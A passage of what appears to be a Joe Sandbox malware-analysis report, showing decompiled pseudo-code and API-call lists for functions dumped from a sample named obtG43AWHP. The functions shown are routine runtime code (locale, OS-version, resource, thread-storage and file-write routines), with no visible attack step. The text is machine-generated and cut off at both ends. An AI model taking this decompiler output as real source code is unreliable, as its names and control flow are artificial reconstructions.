				return _t26;
			}

















    0x004076db
    0x004076e0
    0x004076e2
    0x004076e2
    0x004076f5
    0x00407704
    0x00407707
    0x00407714
    0x00407717
    0x0040771c
    0x0040771f
    0x00407721
    0x0040772e
    0x00407731
    0x00407736
    0x00407739
    0x0040773b
    0x00407744

    APIs
    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 004076F5
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040BA10, Relevance: 1.5, APIs: 1, Instructions: 48
    C-Code - Quality: 100%
    			E0040BA10(void* __ecx) {
				void* _t10;
				char _t11;
				void* _t14;
				intOrPtr _t20;
				intOrPtr _t21;
				char* _t22;

				_t14 = E0040B9A0();
				if(_t14 == 0) {
					_t21 =  *0x419314; // 0xffffffff
					L12:
					return _t21;
				}
				_t18 = _t14;
				_t20 = E0040B960(_t14);
				_t10 = E0040B970(_t18);
				_t21 = _t20;
				if(_t20 !=  *0x419308 || _t10 !=  *0x419318) {
					if(_t20 !=  *0x0041930C) {
						L5:
						if(_t20 !=  *0x00419310) {
							L7:
							_t11 = 0;
							goto L9;
						}
						if(_t10 ==  *0x00419320) {
							goto L8;
						}
						goto L7;
					}
					if(_t10 ==  *0x0041931C) {
						goto L8;
					}
					goto L5;
				} else {
					L8:
					_t11 = 1;
					L9:
					 *_t22 = _t11;
					FreeResource(_t14);
					if( *_t22 == 0) {
						E0040B988();
					}
					goto L12;
				}
			}









    0x0040ba1a
    0x0040ba1e
    0x0040ba76
    0x0040ba7c
    0x0040ba83
    0x0040ba83
    0x0040ba20
    0x0040ba29
    0x0040ba2d
    0x0040ba32
    0x0040ba40
    0x0040ba49
    0x0040ba50
    0x0040ba53
    0x0040ba5a
    0x0040ba5a
    0x00000000
    0x0040ba5a
    0x0040ba58
    0x00000000
    0x00000000
    0x00000000
    0x0040ba58
    0x0040ba4e
    0x00000000
    0x00000000
    0x00000000
    0x0040ba5e
    0x0040ba5e
    0x0040ba5e
    0x0040ba60
    0x0040ba60
    0x0040ba64
    0x0040ba6d
    0x0040ba6f
    0x0040ba6f
    0x00000000
    0x0040ba6d

    APIs
      • Part of subcall function 0040B9A0: FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
      • Part of subcall function 0040B9A0: LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
      • Part of subcall function 0040B9A0: FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
      • Part of subcall function 0040B9A0: LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    • FreeResource.KERNEL32(00000000,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553,00416F00,00000001,00417843,?,?), ref: 0040BA64
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040AD2C, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E0040AD2C() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x4190c0 = _v132;
					 *0x4190c4 = _v144;
					 *0x4190c8 = _v140;
					if( *0x4190c0 != 1) {
						 *0x4190cc = _v136;
					} else {
						 *0x4190cc = _v136 & 0x0000ffff;
					}
					return E004040F8(0x4190d0, 0x80,  &_v128);
				}
				return _t7;
			}










    0x0040ad32
    0x0040ad3a
    0x0040ad41
    0x0040ad47
    0x0040ad50
    0x0040ad59
    0x0040ad65
    0x0040ad7b
    0x0040ad67
    0x0040ad70
    0x0040ad70
    0x00000000
    0x0040ad8e
    0x0040ad99

    APIs
    • GetVersionExA.KERNEL32(?,0040C480,00000000,0040C498), ref: 0040AD3A
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 03003F30, Relevance: 1.5, APIs: 1, Instructions: 4
    C-Code - Quality: 100%
    			E03003F30() {

				SetUnhandledExceptionFilter(E03003EEE);
				return 0;
			}



    0x03003f35
    0x03003f3d

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_00003EEE), ref: 03003F35
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 030073AC, Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134
    APIs
      • Part of subcall function 03004B90: EncodePointer.KERNEL32(00000000,030073D2,0300BE08,00000314,00000000,?,?,?,?,?,0300438C,0300BE08,Microsoft Visual C++ Runtime Library,00012010), ref: 03004B92
    • LoadLibraryW.KERNEL32(USER32.DLL), ref: 030073E7
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 03007403
    • EncodePointer.KERNEL32(00000000), ref: 03007414
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 03007421
    • EncodePointer.KERNEL32(00000000), ref: 03007424
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 03007431
    • EncodePointer.KERNEL32(00000000), ref: 03007434
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 03007441
    • EncodePointer.KERNEL32(00000000), ref: 03007444
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 03007455
    • EncodePointer.KERNEL32(00000000), ref: 03007458
    • DecodePointer.KERNEL32(00000000,0300BE08,00000314,00000000), ref: 0300747A
    • DecodePointer.KERNEL32 ref: 03007484
    • DecodePointer.KERNEL32(?,0300BE08,00000314,00000000), ref: 030074C3
    • DecodePointer.KERNEL32(?), ref: 030074DD
    • DecodePointer.KERNEL32(0300BE08,00000314,00000000), ref: 030074F1
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 03004E89, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109
    C-Code - Quality: 62%
    			E03004E89(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x300c63c = GetProcAddress(_t35, "FlsAlloc");
					 *0x300c640 = GetProcAddress(_t35, "FlsGetValue");
					 *0x300c644 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x300c63c;
					_t39 = TlsSetValue;
					 *0x300c648 = _t7;
					if( *0x300c63c == 0) {
						L6:
						 *0x300c640 = TlsGetValue;
						 *0x300c63c = E03004B99;
						 *0x300c644 = _t39;
						 *0x300c648 = TlsFree;
					} else {
						__eflags =  *0x300c640;
						if( *0x300c640 == 0) {
							goto L6;
						} else {
							__eflags =  *0x300c644;
							if( *0x300c644 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x300b1c4 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x300c640);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E03003F93();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x300c63c);
							 *0x300c63c = _t14;
							_t15 =  *_t41( *0x300c640);
							 *0x300c640 = _t15;
							_t16 =  *_t41( *0x300c644);
							 *0x300c644 = _t16;
							 *0x300c648 =  *_t41( *0x300c648);
							_t18 = E03006D14();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E03004BD6();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x300c63c, E03004D5A);
								 *0x300b1c0 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E03006933(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x300c644,  *0x300b1c0, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E03004C13(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E03004BD6();
					return 0;
				}
			}





















    0x03004e89
    0x03004e97
    0x03004e9b
    0x03004ebb
    0x03004ec8
    0x03004ed5
    0x03004eda
    0x03004edc
    0x03004ee3
    0x03004ee9
    0x03004eee
    0x03004f06
    0x03004f0b
    0x03004f15
    0x03004f1f
    0x03004f25
    0x03004ef0
    0x03004ef0
    0x03004ef7
    0x00000000
    0x03004ef9
    0x03004ef9
    0x03004f00
    0x00000000
    0x03004f02
    0x03004f02
    0x03004f04
    0x00000000
    0x00000000
    0x03004f04
    0x03004f00
    0x03004ef7
    0x03004f2a
    0x03004f30
    0x03004f35
    0x03004f38
    0x03004fff
    0x03004fff
    0x03004fff
    0x03004f3e
    0x03004f45
    0x03004f47
    0x03004f49
    0x00000000
    0x03004f4f
    0x03004f4f
    0x03004f5a
    0x03004f60
    0x03004f68
    0x03004f6d
    0x03004f75
    0x03004f7a
    0x03004f82
    0x03004f89
    0x03004f8e
    0x03004f93
    0x03004f95
    0x03004ffa
    0x03004ffa
    0x00000000
    0x03004f97
    0x03004f97
    0x03004faa
    0x03004fac
    0x03004fb1
    0x03004fb4
    0x00000000
    0x03004fb6
    0x03004fc2
    0x03004fc6
    0x03004fc8
    0x00000000
    0x03004fca
    0x03004fdb
    0x03004fdd
    0x00000000
    0x03004fdf
    0x03004fdf
    0x03004fe1
    0x03004fe2
    0x03004fe9
    0x03004fef
    0x03004ff3
    0x03004ff7
    0x03004ff7
    0x03004fdd
    0x03004fc8
    0x03004fb4
    0x03004f95
    0x03004f49
    0x03005003
    0x03004e9d
    0x03004e9d
    0x03004ea5
    0x03004ea5

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,03002D9E), ref: 03004E91
    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,03002D9E), ref: 03004EB3
    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,03002D9E), ref: 03004EC0
    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,03002D9E), ref: 03004ECD
    • GetProcAddress.KERNEL32(00000000,FlsFree,?,03002D9E), ref: 03004EDA
    • TlsAlloc.KERNEL32(?,03002D9E), ref: 03004F2A
    • TlsSetValue.KERNEL32(00000000,?,03002D9E), ref: 03004F45
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F60
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F6D
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F7A
    • EncodePointer.KERNEL32(?,03002D9E), ref: 03004F87
      • Part of subcall function 03006D14: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 03006D3C
    • DecodePointer.KERNEL32(03004D5A,?,03002D9E), ref: 03004FA8
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • DecodePointer.KERNEL32(00000000,?,03002D9E), ref: 03004FD7
      • Part of subcall function 03004C13: GetModuleHandleW.KERNEL32(KERNEL32.DLL,03009848,00000008,03004D1B,00000000,00000000,?,03003EAA,03002BF3), ref: 03004C24
      • Part of subcall function 03004C13: InterlockedIncrement.KERNEL32(0300B450), ref: 03004C65
    • GetCurrentThreadId.KERNEL32(?,03002D9E), ref: 03004FE9
      • Part of subcall function 03004BD6: DecodePointer.KERNEL32(FFFFFFFF,03004FFF,?,03002D9E), ref: 03004BE7
      • Part of subcall function 03004BD6: TlsFree.KERNEL32(FFFFFFFF,03004FFF,?,03002D9E), ref: 03004C01
      • Part of subcall function 03004BD6: DeleteCriticalSection.KERNEL32(00000000,00000000,00009E40,?,03004FFF,?,03002D9E), ref: 03006D7B
      • Part of subcall function 03004BD6: DeleteCriticalSection.KERNEL32(FFFFFFFF,00009E40,?,03004FFF,?,03002D9E), ref: 03006DA5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 03005429, Relevance: 23.0, APIs: 15, Instructions: 494
    C-Code - Quality: 90%
    			E03005429(void* __ebx, signed int __edx, long _a4, long _a8, signed int _a12) {
				signed int _v8;
				char _v15;
				void _v16;
				short _v1724;
				char _v5140;
				void _v6844;
				short _v6848;
				long _v6852;
				signed char _v6853;
				long _v6860;
				long _v6864;
				int _v6868;
				long _v6872;
				long _v6876;
				long _v6880;
				long _v6884;
				signed int _v6888;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t209;
				long _t211;
				intOrPtr _t214;
				long _t215;
				intOrPtr _t216;
				long _t217;
				void* _t223;
				signed int _t225;
				signed int* _t230;
				long _t242;
				long _t245;
				signed int* _t246;
				long _t252;
				long _t253;
				signed int* _t256;
				long _t262;
				long _t263;
				void* _t267;
				long _t271;
				int _t272;
				long _t274;
				void* _t275;
				short _t277;
				void* _t278;
				void* _t282;
				long _t284;
				void* _t286;
				int _t293;
				int _t300;
				void* _t304;
				intOrPtr* _t313;
				long _t314;
				signed int _t315;
				signed short* _t316;
				signed int _t317;
				long _t318;
				signed short* _t319;
				signed char _t322;
				long _t331;
				long _t335;
				long _t337;
				char _t341;
				signed int _t352;
				long _t355;
				void* _t356;
				void* _t357;
				long _t359;
				signed int _t361;
				void* _t362;

				_t350 = __edx;
				_t312 = __ebx;
				E03007F10(0x1ae4);
				_t209 =  *0x300bbe4; // 0xbb40e64e
				_v8 = _t209 ^ _t361;
				_t211 = _a8;
				_t355 = _a4;
				_t352 = 0;
				_v6864 = _t211;
				_v6860 = 0;
				_v6868 = 0;
				if(_a12 != 0) {
					__eflags = _t211;
					if(_t211 != 0) {
						_push(__ebx);
						_t313 = 0x3012f80 + (_t355 >> 5) * 4;
						_t214 =  *_t313;
						_t352 = (_t355 & 0x0000001f) << 6;
						_t322 =  *((intOrPtr*)(_t214 + _t352 + 0x24)) +  *((intOrPtr*)(_t214 + _t352 + 0x24)) >> 1;
						_v6880 = _t313;
						_v6853 = _t322;
						__eflags = _t322 - 2;
						if(_t322 == 2) {
							L6:
							_t322 =  !_a12;
							__eflags = _t322 & 0x00000001;
							if((_t322 & 0x00000001) != 0) {
								L8:
								__eflags =  *(_t214 + _t352 + 4) & 0x00000020;
								if(( *(_t214 + _t352 + 4) & 0x00000020) != 0) {
									E030052BA(_t322, _t355, 0, 0, 2);
									_t362 = _t362 + 0x10;
								}
								_t215 = E03005C43(_t355);
								__eflags = _t215;
								if(_t215 == 0) {
									L45:
									_t325 = 0;
									__eflags = 0;
									goto L46;
								} else {
									__eflags =  *(_t352 +  *_t313 + 4) & 0x00000080;
									if(__eflags == 0) {
										goto L45;
									}
									_t267 = E03004D40(_t313, _t350, __eflags);
									__eflags =  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14);
									_t355 = 0 |  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14) == 0x00000000;
									_t271 = GetConsoleMode( *(_t352 +  *_t313),  &_v6884);
									_t325 = 0;
									__eflags = _t271;
									if(_t271 == 0) {
										L46:
										_t216 =  *_t313;
										__eflags =  *(_t216 + _t352 + 4) & 0x00000080;
										if(( *(_t216 + _t352 + 4) & 0x00000080) == 0) {
											_t217 = WriteFile( *(_t216 + _t352), _v6864, _a12,  &_v6876, _t325);
											__eflags = _t217;
											if(_t217 == 0) {
												L85:
												_v6848 = GetLastError();
												L86:
												__eflags = _v6860;
												if(_v6860 != 0) {
													_t220 = _v6860 - _v6868;
													__eflags = _v6860 - _v6868;
													L97:
													_pop(_t312);
													L98:
													return E03006BA0(_t220, _t312, _v8 ^ _t361, _t350, _t352, _t355);
												}
												L87:
												__eflags = _v6848;
												if(_v6848 == 0) {
													L91:
													_t223 =  *_v6880;
													__eflags =  *(_t352 + _t223 + 4) & 0x00000040;
													if(( *(_t352 + _t223 + 4) & 0x00000040) == 0) {
														L94:
														 *((intOrPtr*)(E03003EA5())) = 0x1c;
														_t225 = E03003EB8();
														 *_t225 =  *_t225 & 0x00000000;
														__eflags =  *_t225;
														L95:
														_t220 = _t225 | 0xffffffff;
														goto L97;
													}
													__eflags =  *_v6864 - 0x1a;
													if( *_v6864 != 0x1a) {
														goto L94;
													}
													_t220 = 0;
													goto L97;
												}
												_t355 = 5;
												__eflags = _v6848 - _t355;
												if(_v6848 != _t355) {
													_t225 = E03003ECB(_v6848);
												} else {
													 *((intOrPtr*)(E03003EA5())) = 9;
													_t225 = E03003EB8();
													 *_t225 = _t355;
												}
												goto L95;
											}
											_v6848 = _v6848 & 0x00000000;
											_v6860 = _v6876;
											goto L86;
										}
										__eflags = _v6853;
										_v6848 = _t325;
										if(_v6853 != 0) {
											__eflags = _v6853 - 2;
											if(_v6853 != 2) {
												_v6872 = _v6864;
												__eflags = _a12 - _t325;
												if(_a12 <= _t325) {
													goto L91;
												} else {
													goto L70;
												}
												do {
													L70:
													_v6852 = _v6852 & 0x00000000;
													_t331 = _v6872 - _v6864;
													__eflags = _t331;
													_t230 =  &_v1724;
													_t356 = 2;
													do {
														__eflags = _t331 - _a12;
														if(_t331 >= _a12) {
															break;
														}
														_t350 =  *_v6872 & 0x0000ffff;
														_v6872 = _v6872 + _t356;
														_t331 = _t331 + _t356;
														__eflags = _t350 - 0xa;
														if(_t350 == 0xa) {
															_t315 = 0xd;
															 *_t230 = _t315;
															_t230 = _t230 + _t356;
															_t167 =  &_v6852;
															 *_t167 = _v6852 + _t356;
															__eflags =  *_t167;
														}
														_v6852 = _v6852 + _t356;
														 *_t230 = _t350;
														_t230 = _t230 + _t356;
														__eflags = _v6852 - 0x6a8;
													} while (_v6852 < 0x6a8);
													_t355 = 0;
													asm("cdq");
													_t314 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t230 -  &_v1724 - _t350 >> 1,  &_v5140, 0xd55, 0, 0);
													__eflags = _t314;
													if(_t314 == 0) {
														goto L85;
													} else {
														goto L76;
													}
													while(1) {
														L76:
														_t242 = WriteFile( *(_t352 +  *_v6880), _t361 + _t355 - 0x1410, _t314 - _t355,  &_v6876, 0);
														__eflags = _t242;
														if(_t242 == 0) {
															break;
														}
														_t355 = _t355 + _v6876;
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															continue;
														}
														L80:
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															goto L86;
														}
														goto L81;
													}
													_v6848 = GetLastError();
													goto L80;
													L81:
													_t245 = _v6872 - _v6864;
													_v6860 = _t245;
													__eflags = _t245 - _a12;
												} while (_t245 < _a12);
												goto L86;
											}
											_t316 = _v6864;
											__eflags = _a12 - _t325;
											if(_a12 <= _t325) {
												goto L91;
											} else {
												goto L60;
											}
											do {
												L60:
												_v6852 = _v6852 & 0x00000000;
												_t335 = _t316 - _v6864;
												__eflags = _t335;
												_t246 =  &_v6844;
												_t357 = 2;
												do {
													__eflags = _t335 - _a12;
													if(_t335 >= _a12) {
														break;
													}
													_t350 =  *_t316 & 0x0000ffff;
													_t316 = _t316 + _t357;
													_t335 = _t335 + _t357;
													_v6884 = _t316;
													__eflags = _t350 - 0xa;
													if(_t350 == 0xa) {
														_v6868 = _v6868 + _t357;
														_t317 = 0xd;
														 *_t246 = _t317;
														_t316 = _v6884;
														_t246 = _t246 + _t357;
														_t140 =  &_v6852;
														 *_t140 = _v6852 + _t357;
														__eflags =  *_t140;
													}
													_v6852 = _v6852 + _t357;
													 *_t246 = _t350;
													_t246 = _t246 + _t357;
													__eflags = _v6852 - 0x13fe;
												} while (_v6852 < 0x13fe);
												_t355 = _t246 -  &_v6844;
												_t252 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
												__eflags = _t252;
												if(_t252 == 0) {
													goto L85;
												}
												_t253 = _v6876;
												_v6860 = _v6860 + _t253;
												__eflags = _t253 - _t355;
												if(_t253 < _t355) {
													goto L86;
												}
